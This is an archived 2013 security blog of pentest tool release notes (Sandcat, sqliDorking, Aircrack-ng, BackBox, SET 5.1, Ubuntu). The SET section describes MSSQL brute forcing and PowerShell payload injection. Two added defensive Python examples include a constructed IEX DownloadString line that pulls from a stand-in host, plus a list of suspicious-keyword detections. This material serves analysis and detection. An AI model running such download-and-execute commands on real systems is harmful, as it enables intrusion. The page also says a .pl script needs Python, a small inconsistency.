Thursday, May 30, 2013

Sandcat Browser 4.0 released - Lightweight, fast and extensible browser

Sandcat Browser 4.0 - Lightweight, fast and extensible.

Sandcat Browser 4.0 brings unique features that are useful for pen-testers and web developers.

Pen-Tester Tools
Chromium-Powered
Lua-Based Extensions
Display Filters
Console Extensions

Sandcat 4 adds a large number of enhancements, new features, extensions and bug fixes, and provides a dramatically improved user experience on several fronts.
Note: This release uses considerably fewer resources than the beta release. It also adds user interface improvements, speed improvements and new features such as the Live Headers display filter and the capture/pause button.

What's New in Sandcat 4

Changelog -

UI Enhancements

  • Added a Page Menu with several useful options, including:
    • Ability to save the page from the web or from the cache
    • Ability to view the cached version of a page
    • Ability to view the page images
    • Ability to authenticate or re-authenticate
    • Ability to take a screenshot of the page and save as a file
    • Multiple reload options, zoom options and more
  • Added a new Preferences screen, and the ability to export and import the settings from a file.
  • Added a Search Engine selector.
  • Drag and drop
    • Added drag and drop support for tabs.
    • Added support for drag & drop of multiple files.
  • Added a redesigned About Screen that displays more details about the Sandcat installation, including the list of installed extensions.
  • Added an option for clearing the browsing data.
  • Added a redesigned error log screen.
  • Added a redesigned toolbar.
  • Added a redesigned Source page.
  • Added several Preview Extensions that work in combination with the new Resource and Request viewer extensions.
  • Added the ability to bookmark pages and a simple Bookmarks screen.
  • Added a History screen.
  • Added support for downloads and a download management screen.
  • Improved UI responsiveness.

Live Headers Enhancements

  • Added a display filter.
  • Added a redesigned live headers bar.
  • Added a capture/pause button.
  • Added the ability to load and save all requests or individual requests to files.
  • Added a dedicated cache per tab for storing request information (Live Headers Cache).
  • Added an options screen.
  • Added a Request Viewer with a preview tab, syntax highlighting, and request replay and editing capabilities.

Console Enhancements

  • Added a Lua Console.
  • Added a JavaScript Console based on the Sandcat Console.
  • Added new commands (Use the help command to see the list of commands).

Pen-Tester Tools Pack Enhancements

  • Added a new Request Editor with request loading capabilities and an advanced options screen.
  • Added an XHR Editor extension.
  • Added an improved low-level Request Editor.
  • Added new extensions that run as Sandcat Tasks (isolated processes):
    • HTTP Fuzzer
    • XHR Fuzzer
    • CGI Scanner
    • HTTP Brute Force extension
  • Added a new Script Runner extension with saving capability and the ability to execute TIScript.
  • Added a URL Encoder/Decoder extension.
  • Added a Ruby Console extension.
  • Added a Cache Viewer and a Cookies Viewer utility (thanks Nir Sofer for giving permission for their use in Sandcat).
  • Added the ability to create a code editor tab.
  • Added security related search engine options.
  • Improved Tor button.

Extension System Enhancements

  • Added the ability to launch Lua-based tasks, a Task Manager and a task indicator.
  • Added several new Lua libraries and objects. This includes the Console Library, the ExtensionPack Object, the UI Objects, the Prefs Library, the Task Object, the Sandcat Object, and the Selenite libraries.
  • Added the possibility of creating custom consoles.
  • Added a Sandcat TIScript object.
  • Added the ability to associate the HTML elements of a Sandcat Extension User Interface with a Lua table.
  • Added the ability to execute Lua script tags.
  • Improved Lua libraries and objects: Browser Library, App Library and Tab Object.

Bug Fixes

  • Fixed: Source page sometimes not displaying the proper syntax highlighting and exact source for non-HTML files.
  • Fixed: a window focus change related crash.
  • Fixed: occasional crashes when closing a tab while loading or exiting the browser.
  • Fixed: scrolling issues with the Source page.
  • Fixed: live headers sometimes not displaying the content-type.
  • Fixed: favicon sometimes not appearing.
  • Fixed: Sandcat Console unnecessarily resetting console output after visiting same domain URLs.
  • Fixed: JavaScript Sandcat.Write() function not working properly.

Additional changes

  • Configuration file format changed to JSON.
  • The following libraries were upgraded to the latest release: Chromium, OpenSSL and Sciter library.
  • The Tor application was upgraded to the latest release.
  • The Gelo library project has been discontinued and will be replaced by the new Exploit Creator extension pack.
  • The Rudra library was replaced by the new Selenite's Runik library.
  • This page covers how to migrate extensions from Sandcat version 3 to 4


Source-

Tuesday, May 28, 2013

sqliDorking v1.1 released

Find pages vulnerable to SQLi using Google or Bing, also accepts a list of domains.

Features -
Google Dorking
Bing Dorking
Domain name list

Download -
Download sqliDorking.pl (10.3 kB)

Python must be installed to run the script.

Source-
http://sourceforge.net/projects/sqlidorking/

Screenshot -



Penbang v2.0 - Penetration Testing Collection for CrunchBang [Openbox (Debian)]

Penbang is a collection of tools aimed at the Openbox environment. It includes Network Exploits, Vulnerability Assessment/Exploits, Network Analysis, Social Engineering tools, I.G.C, the dsniff suite, and irpas, as well as a simple way of launching them.

Update 21/5/2013 Version 0.0.2

ADDED
  • Metasploit/Armitage
  • sqlninja
  • sqlsus
  • wfuzz
  • hydra
  • hydra-gtk
  • findmyhash
  • etherape
  • SMITM
  • log_ex
  • ParseLog
  • Message of the day (anything launched by Scripts.py)
  • History interpreter (arrow up shows last entry)

REMOVED (....DebianJoe, point taken)
  • tint2 config panel replacement
  • conky config
  • Wrong input clause in install.py

Metasploit directly from menu.xml. It assumes the following:
  • Metasploit is a service; you can start it by /etc/init.d/metasploit start
  • Metasploit is enabled; update-rc.d metasploit enable OR update-rc.d -f metasploit defaults IF YOU REMOVED IT
Armitage directly from menu.xml
Nessus directly from menu.xml

Pack List
  • Network Exploits: aircrack-ng, airmon-ng, airodump-ng, sslstrip, sslsniff, reaver, ettercap, subterfuge, yamas, SMITM (0.0.2 update)
  • Vulnerability Assessment/Exploits (0.0.2 update): Metasploit/Armitage, sqlninja, sqlsus, wfuzz, hydra, hydra-gtk
  • Network Analysis: scapy, kismet, nmap, zenmap, tcpdump, tshark, wireshark, etherape
  • Social Engineering: Maltego
  • I.G.C: crunch, john, Hash-ID, findmyhash (0.0.2 update), log_ex (0.0.2 update), ParseLog (0.0.2 update)
  • dsniff suite: dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, webspy, arpspoof, dnsspoof, macof, sshmitm, webmitm
  • irpas (not all tools from irpas are used): dfkaa, protos, netenum, tctrace, itrace, irdpresponder, irdp, ass, igrp, file2cable, cdp

Download -
Download penbang_0.0.2.zip (6.4 MB)

Source-
http://sourceforge.net/projects/penbang/

Aircrack-ng 1.2 Beta 1 Released

Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like the KoreK attacks, as well as the all-new PTW attack, making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.


Aircrack-ng Changelog

Version 1.2-beta1 (changes from aircrack-ng 1.1) - Released 25 May 2013:
  • Airmon-ng: Added chipset information for ar9170usb, wl, rt2800usb, ar9271, wl12xx, RT3070STA, ath9k_htc, r871x_usb_drv, ath5k, carl9170 and various Intel drivers.
  • Airmon-ng: Fixed chipset information ipw2200.
  • Airmon-ng: Fixed output for r8187 driver.
  • Airmon-ng: Improved chipset information for a few drivers.
  • Airmon-ng: Support for displaying information about ath9k.
  • Airmon-ng: Added 'check kill' to automatically kill services that could interfere.
  • Airmon-ng: Fixed issues with Intel chipsets detection.
  • Airmon-ng: Updated iw download link.
  • Airmon-ng: Better mac80211 handling
  • Airmon-ng: Added detection for WiLink TI driver, rtl819xU, iwlwifi.
  • Airmon-zc: Improved version of Airmon-ng with more detailed information.
  • Airdecap-ng: Fixed decoding QoS frames (Closes: #667 and #858).
  • Airgraph-ng: Use Aircrack-ng Makefile instead of its own.
  • Airbase-ng: Fixed bug using clients list.
  • Airbase-ng: Fixed issue with QoS (ticket #760).
  • Airbase-ng: Fixed sending beacons with null SSID.
  • Airbase-ng: Allow non ASCII ESSID
  • Airodump-ng: Fixed buffer overflow (ticket #728).
  • Airodump-ng: Fixed channel parsing.
  • Airodump-ng: Fixed FreeBSD battery reading.
  • Airodump-ng: Renamed “Packets” column to “Frames” (“Packets” was not correct).
  • Airodump-ng: Fixed XML bugs when outputting NetXML: ESSID containing '&' or chinese characters, when multiple encryption are used.
  • Airodump-ng: Add alternative paths for Airodump-ng OUI file.
  • Airodump-ng: Added GPSd 2.92+ support (JSON).
  • Airodump-ng: Add option --manufacturer to display manufacturer column on airodump-ng.
  • Airodump-ng: Add feature to show APs uptime (--uptime) based on the timestamp.
  • Airodump-ng-OUI-update: Fixed OUI URL and allow CURL redirect (ticket #829).
  • Airdrop-ng: removed .py from file names.
  • Airdrop-ng: Fixed bug in installer.
  • Airdrop-ng: Fixed OUI lookup.
  • Airdrop-ng: Fixed bug when several BSSID have the same ESSID.
  • Airdrop-ng: Doesn't constantly parse anymore, wait 5 seconds each time it parses.
  • Airdrop-ng: Fixed crash when failing to get channel or when rules file didn't exist.
  • Airdrop-ng: Fixed to use lorcon.py/lorcon2 libs.
  • Airdrop-ng: Updated README.
  • Airdrop-ng: Fixed error preventing update to work.
  • Versuck-ng: New script to do the same thing as the kismet autowep plugin from the CLI.
  • Aircrack-ng: Fixed counter display error when cracking WPA.
  • Aircrack-ng: Added output of the WPA handshake to EWSA project file.
  • Aircrack-ng: Added output of the WPA handshake to oclhashcat+ project file.
  • Aircrack-ng: Added benchmark option, -S.
  • Aircrack-ng: Fixed -u option.
  • Aircrack-ng: PIC fix for hardened systems from Francisco Blas Izquierdo Riera (klondike)
  • Aircrack-ng: Allow dictionaries larger than 2Gb.
  • Aircrack-ng: Give a better message when there's an error with the dictionary.
  • Aircrack-ng: Prevent a buffer overflow from happening (Wojciech Waga).
  • Aireplay-ng: Added migration mode attack from Leandro Meiners and Diego Sor from Core Security (BlackHat Las Vegas 2010)
  • Aireplay-ng, Airodump-ng: Added option to ignore issue with -1 channel.
  • Airserv-ng: Fixed crash when clients disconnect.
  • Besside-ng-crawler: Added EAPOL Crawler.
  • Airdecloak-ng: Fixed bug when using pcap files with PPI headers.
  • dcrack: Distributed cracking server/client
  • wifi-detect.sh: reference script for testing wifi card detection using iwconfig vs ls /sys/class/net
  • WPA Clean: Tool to merge and clean WPA capture files.
  • Wireless Panda: C# Library to parse Airodump-ng output files (and added example project).
  • OSdep (Linux): Setting fixed bitrates on mac80211 2.6.31 and up.
  • OSdep (Linux): Added support for nl80211 thanks to impulse32. Use 'make libnl=true' to add netlink support (Ticket #1004).
  • Manpages: Improvement and fixes for Airgraph-ng, Airodump-ng, packetforge-ng, Aircrack-ng
  • Manpages: Fixed various spelling issues and single quote issues.
  • Makefiles: Added tests for the different tools.
  • Makefiles: Various fixes and improvements.
  • Makefiles: Added support for libgcrypt instead of OpenSSL via parameter.
  • Patches: Added a few patches.
  • Removed useless script: patchchk.
  • Finally fixed licensing issues.
  • Fixed endianness issues in most of the tools.
  • Fixed cppcheck errors (Ticket #957).
  • Fixed various compilation issues on Linux and Cygwin, GNU/Hurd, Darwin (OSX) and Sparc.
  • Fixed compilation on recent gcc versions on Linux, Cygwin.
  • Added instructions for Travis CI: Free Hosted Continuous Integration Platform for the Open Source Community.
  • Added Readme.Md for GitHub. Aircrack-ng subversion repository is synced on GitHub: http://github.com/aircrack-ng/aircrack-ng
  • Various other small bug fixes.

Download:
  • aircrack-ng-1.2-beta1-win.zip (7.90 MB) (Windows)
  • aircrack-ng-1.2-beta1.tar.gz (3.29 MB) (Unix)
Source-

BackBox Linux 3.05 released!

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. It is designed to be fast, easy to use and to provide a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable version of the most used and best known ethical hacking tools.

The BackBox Team is pleased to announce the updated release of BackBox Linux, version 3.05. This release includes features such as Linux Kernel 3.2, compat-wireless 3.8 (with Aircrack-NG patch) and Xfce 4.8.

The ISO images (32bit & 64bit) can be downloaded from the following location:
http://www.backbox.org/downloads

What's new
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Update menu
  • Improved Wi-Fi drivers (compat-wireless v3.8 with Aircrack-NG patch)
  • Full support to Kernel 3.5 and 3.8 (install it with apt-get/synaptic)
  • Predisposition to ARM architecture (new armhf.iso coming soon)
  • New and updated hacking tools (automater, inundator, ettercap, wireshark, se-toolkit, metasploit, sqlmap, beef, recon-ng, zaproxy, weevely, thc-ipv6, truecrack, hashcat, etc.)
System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 4.4 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port

Source-

Monday, May 27, 2013

The Social-Engineer Toolkit (SET) v5.1 Released

The Social-Engineer Toolkit (SET) version 5.1, codename “Name of the Doctor”, has been released. This version adds a complete rewrite of the MSSQL Bruter as well as a new attack vector utilizing the PSExec functionality within Metasploit. The MSSQL Bruter now incorporates UDP port 1434 quick discovery: it sends a specially crafted packet to MSSQL servers, which return the port automatically. This technique eliminates the need to port scan and quickly identifies the SQL server as well as the port the SQL server is listening on. In addition, SET has moved away from the _mssql Python module and towards impacket from Core Security. The main reasons for this are instabilities in later versions of _mssql, with execute_query() being broken, and the functionality built into impacket, which makes it much easier to use.

In addition to utilizing impacket: originally SET had two options for payload delivery, the first being PowerShell and the second the binary-to-hex debug conversion attack vector. This has been changed to automatically detect whether PowerShell is installed on the victim machine; if it is, SET deploys a PowerShell injection technique that has been completely rewritten in the MSSQL module. If it does not detect PowerShell, it automatically falls back to the debug method. Lastly, on the MSSQL Bruter side, the performance of brute forcing, discovery, and deploying of payloads has been increased significantly.
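The UDP 1434 quick discovery described above relies on the SQL Server Browser service: a one-byte request (the SSRP CLNT_UCAST_EX message from Microsoft's public MC-SQLR specification) is answered with an ASCII listing of every instance on the host together with its TCP port, which is why no port scan is needed and why instances off port 1433 show up. The Python below is an added example written for this post, not code from SET. It parses such a reply (the sample bytes are constructed, not captured from a real host) so a defender can inventory what a Browser service discloses, flag instances advertised on non-default ports, and expand CIDR notation in the way SET's printCIDR function is described as doing; the function names are the example's own.

```python
"""Inventory SQL Server instances advertised by the Browser service (SSRP, UDP/1434).

Added example, not SET's code. Reply layout per MC-SQLR: one byte 0x05 (SVR_RESP),
a 2-byte little-endian body length, then ASCII records of key;value pairs, each
record terminated by ";;".
"""
import ipaddress
import socket
import struct

CLNT_UCAST_EX = b"\x03"   # single-byte request: "list all instances"
SVR_RESP = 0x05           # first byte of every Browser service reply

# Constructed sample reply (not captured from a real host): the default instance on
# 1433 and a named instance on a dynamic port, both on the same server.
SAMPLE_BODY = (
    b"ServerName;DBHOST1;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;10.50.1600.1;tcp;1433;;"
    b"ServerName;DBHOST1;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;11.0.2100.60;np;\\\\DBHOST1\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;tcp;49170;;"
)
SAMPLE_REPLY = bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_BODY)) + SAMPLE_BODY


def parse_ssrp_reply(data):
    """Return one dict per advertised instance: server, instance, version,
    is_clustered and tcp_port (None when the instance only exposes named pipes)."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP message")
    (length,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + length]
    if len(body) != length:
        raise ValueError("truncated SSRP reply")
    instances = []
    for record in body.decode("ascii", errors="replace").split(";;"):
        if not record:
            continue
        fields = record.split(";")
        if len(fields) % 2:
            raise ValueError("malformed record: %r" % record)
        kv = dict(zip(fields[0::2], fields[1::2]))   # key;value;key;value...
        port = kv.get("tcp")
        instances.append({
            "server": kv.get("ServerName"),
            "instance": kv.get("InstanceName"),
            "version": kv.get("Version"),
            "is_clustered": kv.get("IsClustered") == "Yes",
            "tcp_port": int(port) if port and port.isdigit() else None,
        })
    return instances


def nonstandard_ports(instances, expected=(1433,)):
    """Instances listening on a TCP port outside the set you expect; these are the
    'ports that are not on port 1433' that the changelog says discovery finds."""
    return [i["instance"] for i in instances
            if i["tcp_port"] is not None and i["tcp_port"] not in expected]


def hosts_in_scope(cidr):
    """Expand CIDR notation into host addresses (the job SET gives printCIDR)."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]


def query_browser(host, timeout=2.0):
    """Ask one host you administer what its Browser service discloses.
    Returns [] when nothing answers. Not exercised by the sample run below."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, 1434))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_ssrp_reply(data)


if __name__ == "__main__":
    found = parse_ssrp_reply(SAMPLE_REPLY)
    for inst in found:
        print(inst)
    print("instances on non-default ports:", nonstandard_ports(found))
    print("hosts in 192.0.2.0/30:", hosts_in_scope("192.0.2.0/30"))
```

Anything the Browser service returns here is exactly what an unauthenticated sender on the network can learn, so the same listing is a useful check of whether UDP 1434 needs to be reachable from outside the database segment at all.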
For a video of the features, check out below:

A new attack vector built into SET is the psexec attack vector inside the Fast-Track menu. During a penetration test, you often have credentials to a server and want Meterpreter on a wide scale. The traditional psexec module gets picked up by anti-virus due to known signatures being used. You can use the EXE::Custom advanced feature, however it still doesn’t give you the ability to select RHOSTS (multiple IP addresses) unless you custom script it or go through something like railgun. The newer module “psexec_command” allows you to specify RHOSTS as well as execute a command on the operating system. Inside of SET, the psexec attack vector will automatically create a Meterpreter backdoor through PowerShell and deploy it to the systems you have permission to test (RHOSTS). You can use either a username and password that you’ve decrypted or the hash for the pass-the-hash attack vector.
In addition to the new attack vectors, a number of other improvements, bug fixes, and enhancements have been made in this release. For more on all of the changes, check out the changelog below:
~~~~~~~~~~~~~~~~
version 5.1
~~~~~~~~~~~~~~~~
* when specifying a custom wordlist in SET – added the ability for ports to be specified ipaddr:portnum for example 192.168.5.5:2052 just in case a SQL server is not listening on 1433
* incorporated udp port 1434 enumeration instead of portscanning – much faster and more efficient – also finds ports that are not on port 1433 (thanks Larry Spohn)
* removed the src/core/portscan.py it is no longer needed
* added impacket as a dependency – will be used for psexec command execution and TDS connections via mssql
* fixed an issue that would cause the import modules to not load properly when relaunching the MSSQL Brute attack
* improved the speed of the MSSQL brute attack on initial brute force
* completely rewrote MSSQL Brute to incorporate impacket – SET no longer uses the _mssql module – highly buggy in the latest versions
* improved udp 1434 detection capability by piping through the printCIDR function which will utilize CIDR notations when scanning
* incorporated new function called capture which will take stdout from function calls and present them as a string – important when doing regex in impacket
* streamlined the MSSQL bruter to automatically profile the system to determine if Powershell is installed, if so it will automatically do powershell injection, if not it will fall back to the Windows debug method for payload delivery
* rewrote the entire powershell deployment module – it now ties in to standard powershell shell payload delivery system
* added dynamic shellcode patching to the MSSQL bruter – now generates shellcode automatically, cast it unicode, then base64 encoding for EncodedCommand powershell bypass technique
* rewrote the hex2binary deployment method to support the new impacket method – it will now automatically deliver a binary based on the attack vector that you want to use
* shrunk the powershell injection code to fit properly within MSSQL xp_cmdshell one call
* added one line for xp_cmdshell disable which works on later versions of Windows
* removed the portscan functionality completely out of the MSSQL payload
* rewrote all portions of the MSSQL bruter to be fully impacket and removed the dependency for _mssql from fast-track
* added new attack vector within the Fast-Track menu “PSEXEC Powershell Injection” which will allow you to specify psexec_command and compromise via direct memory injection
* added ability to set threads within the new PSEXEC PowerShell Injection technique
* added quick dynamic patching for the powershell injection technique for payloads
* added a new trustedsec intro ascii art that has the TS logo on it
* updated rid_enum to the latest github version inside SET
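The EncodedCommand technique in the changelog (payload cast to Unicode, then base64-encoded for PowerShell's EncodedCommand bypass, used by both the MSSQL bruter and the PSEXEC PowerShell Injection vector) shows up on the defending side as a powershell.exe command line carrying a long base64 argument. This added Python example, which is not SET's code, reverses that encoding from process-creation log lines so an analyst can read what such a command line runs, and flags a few indicators worth a second look; the sample command lines are constructed here, and the function names and indicator list are the example's own.

```python
"""Decode and triage PowerShell -EncodedCommand arguments from process logs.

Added example, not SET's code. The encoding is the one the changelog describes
(script -> UTF-16LE -> base64); decoding is its exact inverse.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match the
# common short forms as well as the full switch name (longest alternative first).
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)"
)
HIDDEN_WINDOW = re.compile(r"(?i)[-/]w(?:indowstyle)?\s+hidden")

# Substrings an analyst would want highlighted in the decoded script (example list).
SUSPICIOUS = (
    "IEX", "Invoke-Expression", "DownloadString",
    "VirtualAlloc", "[Runtime.InteropServices.Marshal]",
)


def encode_command(script):
    """Build the argument the way the changelog describes it (Unicode, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(arg):
    """base64 -> UTF-16LE text; raises on an argument that is not valid base64."""
    return base64.b64decode(arg, validate=True).decode("utf-16le")


def find_encoded_commands(command_line):
    """Every decoded script carried by -EncodedCommand style switches on the line."""
    return [decode_encoded_command(m.group(1)) for m in ENC_FLAG.finditer(command_line)]


def triage(command_line):
    """Decode the command line and summarise what a reviewer should look at."""
    decoded = find_encoded_commands(command_line)
    hits = sorted({ind for script in decoded for ind in SUSPICIOUS
                   if ind.lower() in script.lower()})
    return {
        "decoded": decoded,
        "indicators": hits,
        "hidden_window": bool(HIDDEN_WINDOW.search(command_line)),
    }


# Constructed sample log lines (not from a real system).
BENIGN_LINE = "powershell.exe -NoP -Enc " + encode_command("Get-Date")
SUSPICIOUS_LINE = (
    "powershell.exe -NoP -NonI -W Hidden -Enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://constructed.invalid/a')")
)


if __name__ == "__main__":
    for line in (BENIGN_LINE, SUSPICIOUS_LINE):
        print(triage(line))
```

The decode step matters more than the indicator list: string-matching on the raw command line never sees the script, because the base64 blob changes whenever a single byte of the payload does (the "dynamic shellcode patching" entries above), whereas the decoded text is what the interpreter actually executes.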

Source-

Thursday, May 2, 2013

Ubuntu 13.04 Released "Raring Ringtail"

The Ubuntu developers are moving quickly to bring you the absolute latest and greatest software the Open Source community has to offer. The Ubuntu 13.04 Release is the next version of Ubuntu.

In Ubuntu 13.04 the kernel is based on v3.8, LibreOffice has been upgraded to version 4.0, and the default music player is Rhythmbox 2.98. It no longer includes the Ubuntu One music store plug-in. You can now access the Ubuntu music service through an entry in the sidebar launcher. There are various improvements in the Unity desktop.


Get Ubuntu 13.04

Upgrading from Ubuntu 12.10

To upgrade from Ubuntu 12.10 on a desktop system:
  • Open Software Sources.
  • Press Alt+F2 and type in "update-manager" (without the quotes) into the command box.
  • Update Manager should open up and tell you: New distribution release '13.04' is available.
  • Click Upgrade and follow the on-screen instructions.
To upgrade from Ubuntu 12.10 on a server system:
  • Install the update-manager-core package if it is not already installed.
  • Launch the upgrade tool with the command sudo do-release-upgrade.
  • Follow the on-screen instructions.
Note that the server upgrade will use GNU screen and automatically re-attach in case of e.g. dropped connection problems.
Offline upgrade options via alternate CDs are no longer offered for Ubuntu Desktop and Ubuntu Server. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above.

Upgrading from other releases

Users of other Ubuntu releases need to upgrade first to 12.10, and then to 13.04.
For further information on upgrading to 12.10, please see its upgrade instructions.

Ubuntu downloader for Windows discontinued

Due to various bugs in Wubi that have not been addressed in time for the final release, the Ubuntu team will not be releasing the Wubi installer with 13.04. You can read more about this decision here. Users who wish to try out Ubuntu without repartitioning a Windows system are encouraged to use a live system instead, booted from either a DVD or a USB disk.

Support lifespan reduced

Ubuntu 13.04 will only be supported for 9 months. Previous non-LTS releases were supported for 18 months. For more information, please read the announcements here or here.

Download Ubuntu 13.04

13.04 images can be downloaded from a location near you.
You can download 13.04 ISOs from:

New features in 13.04

Please see the Raring blueprint list for details.
Please test and report any bugs you find: